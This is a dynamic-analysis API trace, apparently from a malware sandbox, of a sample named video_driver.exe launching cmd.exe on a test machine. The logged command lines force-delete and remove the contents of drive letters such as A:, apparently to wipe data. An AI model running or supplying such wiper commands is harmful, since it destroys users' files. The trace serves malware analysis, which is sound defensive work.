lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x24f7ec | out: lpFindFileData=0x24f7ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3e5760 [0066.478] FindClose (in: hFindFile=0x3e5760 | out: hFindFile=0x3e5760) returned 1 [0066.478] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0066.478] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0066.478] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0066.478] GetProcessHeap () returned 0x3d0000 [0066.478] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e4c70 | out: hHeap=0x3d0000) returned 1 [0066.478] GetEnvironmentStringsW () returned 0x3e4180* [0066.479] GetProcessHeap () returned 0x3d0000 [0066.479] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb36) returned 0x3e5fa0 [0066.479] FreeEnvironmentStringsW (penv=0x3e4180) returned 1 [0066.479] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.479] GetProcessHeap () returned 0x3d0000 [0066.479] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e17c8 | out: hHeap=0x3d0000) returned 1 [0066.479] GetProcessHeap () returned 0x3d0000 [0066.479] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x400e) returned 0x3e6ae0 [0066.479] GetProcessHeap () returned 0x3d0000 [0066.479] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xa0) returned 0x3e2e50 [0066.480] GetProcessHeap () returned 0x3d0000 [0066.480] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e6ae0 | out: hHeap=0x3d0000) returned 1 [0066.480] GetConsoleOutputCP () returned 0x1b5 [0066.480] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.480] GetUserDefaultLCID () returned 0x409 [0066.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0066.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fbb0, cchData=128 | out: lpLCData="0") returned 2 [0066.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fbb0, cchData=128 | out: lpLCData="0") returned 2 [0066.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fbb0, cchData=128 | out: lpLCData="1") returned 2 [0066.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0066.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0066.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0066.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0066.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0066.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0066.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0066.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0066.482] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0066.482] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0066.482] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0066.483] GetProcessHeap () returned 0x3d0000 [0066.483] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x20c) returned 0x3e2ef8 [0066.483] GetConsoleTitleW (in: lpConsoleTitle=0x3e2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0066.486] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0066.486] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0066.486] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0066.486] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0066.486] GetProcessHeap () returned 0x3d0000 [0066.486] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x400a) returned 0x3e6ae0 [0066.487] GetProcessHeap () returned 0x3d0000 [0066.487] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x4008) returned 0x3eaaf8 [0066.487] GetProcessHeap () returned 0x3d0000 [0066.487] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x1a) returned 0x3e57e0 [0066.487] GetEnvironmentVariableW (in: lpName="p IN (\"Z", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.487] _wcsicmp (_String1="p IN (\"Z", _String2="CD") returned 13 [0066.487] _wcsicmp (_String1="p IN (\"Z", _String2="ERRORLEVEL") returned 11 [0066.487] _wcsicmp (_String1="p IN (\"Z", _String2="CMDEXTVERSION") returned 13 [0066.487] _wcsicmp (_String1="p IN (\"Z", _String2="CMDCMDLINE") returned 13 [0066.487] _wcsicmp (_String1="p IN (\"Z", _String2="DATE") returned 12 [0066.487] _wcsicmp (_String1="p IN (\"Z", _String2="TIME") returned -4 [0066.487] _wcsicmp (_String1="p IN (\"Z", _String2="RANDOM") returned -2 [0066.487] _wcsicmp (_String1="p IN (\"Z", _String2="HIGHESTNUMANODENUMBER") returned 8 [0066.488] GetProcessHeap () returned 0x3d0000 [0066.488] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e57e0 | out: hHeap=0x3d0000) returned 1 [0066.488] GetProcessHeap () returned 0x3d0000 [0066.488] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3eaaf8 | out: hHeap=0x3d0000) returned 1 [0066.488] GetProcessHeap () returned 0x3d0000 [0066.488] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x4008) returned 0x3eaaf8 [0066.488] GetProcessHeap () returned 0x3d0000 [0066.488] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3eaaf8 | out: hHeap=0x3d0000) returned 1 [0066.488] GetProcessHeap () returned 0x3d0000 [0066.488] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e6ae0 | out: hHeap=0x3d0000) returned 1 [0066.488] _wcsicmp (_String1="if", _String2=")") returned 64 [0066.488] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0066.488] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0066.488] _wcsicmp (_String1="IF", _String2="if") returned 0 [0066.489] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0066.489] GetProcessHeap () returned 0x3d0000 [0066.489] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e3110 [0066.489] GetProcessHeap () returned 0x3d0000 [0066.489] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xe) returned 0x3dffc0 [0066.489] GetProcessHeap () returned 0x3d0000 [0066.489] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x20) returned 0x3e57e0 [0066.490] GetProcessHeap () returned 0x3d0000 [0066.490] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3e57e0, Size=0x16) returned 0x3e1800 [0066.490] GetProcessHeap () returned 0x3d0000 [0066.490] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3e1800) returned 0x16 [0066.490] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0066.491] GetProcessHeap () returned 0x3d0000 [0066.491] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e3170 [0066.491] GetProcessHeap () returned 0x3d0000 [0066.491] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x14) returned 0x3e31d0 [0066.491] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0066.491] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0066.491] GetProcessHeap () returned 0x3d0000 [0066.491] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x12) returned 0x3e31f0 [0066.491] GetProcessHeap () returned 0x3d0000 [0066.491] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x1c) returned 0x3e57e0 [0066.491] GetProcessHeap () returned 0x3d0000 [0066.491] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3e57e0, Size=0x14) returned 0x3e3210 [0066.491] GetProcessHeap () returned 0x3d0000 [0066.492] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3e3210) returned 0x14 [0066.492] _wcsicmp (_String1="del", _String2=")") returned 59 [0066.492] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0066.492] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0066.492] _wcsicmp (_String1="IF", _String2="del") returned 5 [0066.492] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0066.492] _wcsicmp (_String1="REM", _String2="del") returned 14 [0066.492] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0066.492] GetProcessHeap () returned 0x3d0000 [0066.492] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e3230 [0066.492] GetProcessHeap () returned 0x3d0000 [0066.493] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x10) returned 0x3dffd8 [0066.493] GetProcessHeap () returned 0x3d0000 [0066.493] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x28) returned 0x3e3290 [0066.494] GetProcessHeap () returned 0x3d0000 [0066.494] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e32c0 [0066.494] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0066.495] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0066.495] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0066.495] GetProcessHeap () returned 0x3d0000 [0066.495] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e3320 [0066.495] GetProcessHeap () returned 0x3d0000 [0066.495] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x44) returned 0x3e3380 [0066.495] GetProcessHeap () returned 0x3d0000 [0066.495] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x14) returned 0x3e33d0 [0066.495] GetProcessHeap () returned 0x3d0000 [0066.495] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3e33d0, Size=0x12) returned 0x3e33d0 [0066.495] GetProcessHeap () returned 0x3d0000 [0066.495] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3e33d0) returned 0x12 [0066.495] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0066.496] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0066.496] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0066.496] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0066.496] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0066.496] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0066.497] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0066.497] GetProcessHeap () returned 0x3d0000 [0066.497] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x12) returned 0x3e33f0 [0066.498] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0066.498] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0066.498] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0066.498] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0066.498] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0066.498] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0066.499] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0066.499] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0066.499] GetProcessHeap () returned 0x3d0000 [0066.499] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e3410 [0066.499] GetProcessHeap () returned 0x3d0000 [0066.499] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x14) returned 0x3e3470 [0066.499] GetProcessHeap () returned 0x3d0000 [0066.499] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x20) returned 0x3e57e0 [0066.501] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0066.503] GetFullPathNameW (in: lpFileName="Z:", nBufferLength=0x208, lpBuffer=0x24f8a0, lpFilePart=0x24f64c | out: lpBuffer="Z:\\", lpFilePart=0x24f64c*=0x0) returned 0x3 [0066.503] wcsncmp (_String1="Z:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -2 [0066.508] GetFileAttributesW (lpFileName="Z:\\" (normalized: "z:")) returned 0xffffffff [0066.509] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.509] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.509] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.509] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0066.509] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.509] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0066.510] SetConsoleInputExeNameW () returned 0x1 [0066.510] GetConsoleOutputCP () returned 0x1b5 [0066.510] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.510] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.510] exit (_Code=0) Process: id = "47" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4194a000" os_pid = "0xba8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"A:\" del /f /s /q \"A:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 75 os_tid = 0xba4 [0066.606] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3dfa44 | out: lpSystemTimeAsFileTime=0x3dfa44*(dwLowDateTime=0x5836f20, dwHighDateTime=0x1d62400)) [0066.606] GetCurrentProcessId () returned 0xba8 [0066.606] GetCurrentThreadId () returned 0xba4 [0066.607] GetTickCount () returned 0x1148151 [0066.607] QueryPerformanceCounter (in: lpPerformanceCount=0x3dfa3c | out: lpPerformanceCount=0x3dfa3c*=18674002723) returned 1 [0066.608] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0066.608] __set_app_type (_Type=0x1) [0066.608] __p__fmode () returned 0x770331f4 [0066.608] __p__commode () returned 0x770331fc [0066.609] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0066.609] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0066.609] GetCurrentThreadId () returned 0xba4 [0066.609] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xba4) returned 0x60 [0066.609] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0066.609] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0066.609] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.610] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0066.610] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3df9d4 | out: phkResult=0x3df9d4*=0x0) returned 0x2 [0066.610] VirtualQuery (in: lpAddress=0x3dfa0b, lpBuffer=0x3df9a4, dwLength=0x1c | out: lpBuffer=0x3df9a4*(BaseAddress=0x3df000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.610] VirtualQuery (in: lpAddress=0x2e0000, lpBuffer=0x3df9a4, dwLength=0x1c | out: lpBuffer=0x3df9a4*(BaseAddress=0x2e0000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0066.610] VirtualQuery (in: lpAddress=0x2e1000, lpBuffer=0x3df9a4, dwLength=0x1c | out: lpBuffer=0x3df9a4*(BaseAddress=0x2e1000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0066.610] VirtualQuery (in: lpAddress=0x2e3000, lpBuffer=0x3df9a4, dwLength=0x1c | out: lpBuffer=0x3df9a4*(BaseAddress=0x2e3000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.610] VirtualQuery (in: lpAddress=0x3e0000, lpBuffer=0x3df9a4, dwLength=0x1c | out: lpBuffer=0x3df9a4*(BaseAddress=0x3e0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xd0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0066.610] GetConsoleOutputCP () returned 0x1b5 [0066.611] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.611] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0066.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.611] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0066.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.611] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0066.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.612] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.612] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.612] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0066.612] GetEnvironmentStringsW () returned 0x5020f8* [0066.612] GetProcessHeap () returned 0x4f0000 [0066.612] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xaca) returned 0x502bd0 [0066.612] FreeEnvironmentStringsW (penv=0x5020f8) returned 1 [0066.613] GetProcessHeap () returned 0x4f0000 [0066.613] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4) returned 0x501898 [0066.613] GetEnvironmentStringsW () returned 0x5020f8* [0066.613] GetProcessHeap () returned 0x4f0000 [0066.613] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xaca) returned 0x5036a8 [0066.613] FreeEnvironmentStringsW (penv=0x5020f8) returned 1 [0066.613] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3de944 | out: phkResult=0x3de944*=0x68) returned 0x0 [0066.613] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3de94c, lpData=0x3de950, lpcbData=0x3de948*=0x1000 | out: lpType=0x3de94c*=0x0, lpData=0x3de950*=0x0, lpcbData=0x3de948*=0x1000) returned 0x2 [0066.613] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3de94c, lpData=0x3de950, lpcbData=0x3de948*=0x1000 | out: lpType=0x3de94c*=0x4, lpData=0x3de950*=0x1, lpcbData=0x3de948*=0x4) returned 0x0 [0066.613] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3de94c, lpData=0x3de950, lpcbData=0x3de948*=0x1000 | out: lpType=0x3de94c*=0x0, lpData=0x3de950*=0x1, lpcbData=0x3de948*=0x1000) returned 0x2 [0066.613] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3de94c, lpData=0x3de950, lpcbData=0x3de948*=0x1000 | out: lpType=0x3de94c*=0x4, lpData=0x3de950*=0x0, lpcbData=0x3de948*=0x4) returned 0x0 [0066.613] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3de94c, lpData=0x3de950, lpcbData=0x3de948*=0x1000 | out: lpType=0x3de94c*=0x4, lpData=0x3de950*=0x40, lpcbData=0x3de948*=0x4) returned 0x0 [0066.614] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3de94c, lpData=0x3de950, lpcbData=0x3de948*=0x1000 | out: lpType=0x3de94c*=0x4, lpData=0x3de950*=0x40, lpcbData=0x3de948*=0x4) returned 0x0 [0066.614] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3de94c, lpData=0x3de950, lpcbData=0x3de948*=0x1000 | out: lpType=0x3de94c*=0x0, lpData=0x3de950*=0x40, lpcbData=0x3de948*=0x1000) returned 0x2 [0066.614] RegCloseKey (hKey=0x68) returned 0x0 [0066.614] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3de944 | out: phkResult=0x3de944*=0x68) returned 0x0 [0066.614] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3de94c, lpData=0x3de950, lpcbData=0x3de948*=0x1000 | out: lpType=0x3de94c*=0x0, lpData=0x3de950*=0x40, lpcbData=0x3de948*=0x1000) returned 0x2 [0066.614] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3de94c, lpData=0x3de950, lpcbData=0x3de948*=0x1000 | out: lpType=0x3de94c*=0x4, lpData=0x3de950*=0x1, lpcbData=0x3de948*=0x4) returned 0x0 [0066.614] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3de94c, lpData=0x3de950, lpcbData=0x3de948*=0x1000 | out: lpType=0x3de94c*=0x0, lpData=0x3de950*=0x1, lpcbData=0x3de948*=0x1000) returned 0x2 [0066.614] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3de94c, lpData=0x3de950, lpcbData=0x3de948*=0x1000 | out: lpType=0x3de94c*=0x4, lpData=0x3de950*=0x0, lpcbData=0x3de948*=0x4) returned 0x0 [0066.614] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3de94c, lpData=0x3de950, lpcbData=0x3de948*=0x1000 | out: lpType=0x3de94c*=0x4, lpData=0x3de950*=0x9, lpcbData=0x3de948*=0x4) returned 0x0 [0066.614] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3de94c, lpData=0x3de950, lpcbData=0x3de948*=0x1000 | out: lpType=0x3de94c*=0x4, lpData=0x3de950*=0x9, lpcbData=0x3de948*=0x4) returned 0x0 [0066.614] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3de94c, lpData=0x3de950, lpcbData=0x3de948*=0x1000 | out: lpType=0x3de94c*=0x0, lpData=0x3de950*=0x9, lpcbData=0x3de948*=0x1000) returned 0x2 [0066.614] RegCloseKey (hKey=0x68) returned 0x0 [0066.614] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6c [0066.614] srand (_Seed=0x5eb34b6c) [0066.614] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"A:\" del /f /s /q \"A:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q" [0066.614] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"A:\" del /f /s /q \"A:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q" [0066.615] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.615] GetProcessHeap () returned 0x4f0000 [0066.615] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x210) returned 0x5020f8 [0066.615] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x502100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0066.615] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0066.615] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0066.615] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.615] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0066.615] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0066.615] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0066.616] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0066.616] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0066.616] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0066.616] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0066.616] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0066.616] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0066.616] GetProcessHeap () returned 0x4f0000 [0066.616] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x502bd0 | out: hHeap=0x4f0000) returned 1 [0066.616] GetEnvironmentStringsW () returned 0x502310* [0066.616] GetProcessHeap () returned 0x4f0000 [0066.616] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xae2) returned 0x504c70 [0066.616] FreeEnvironmentStringsW (penv=0x502310) returned 1 [0066.616] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0066.616] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.616] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0066.616] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 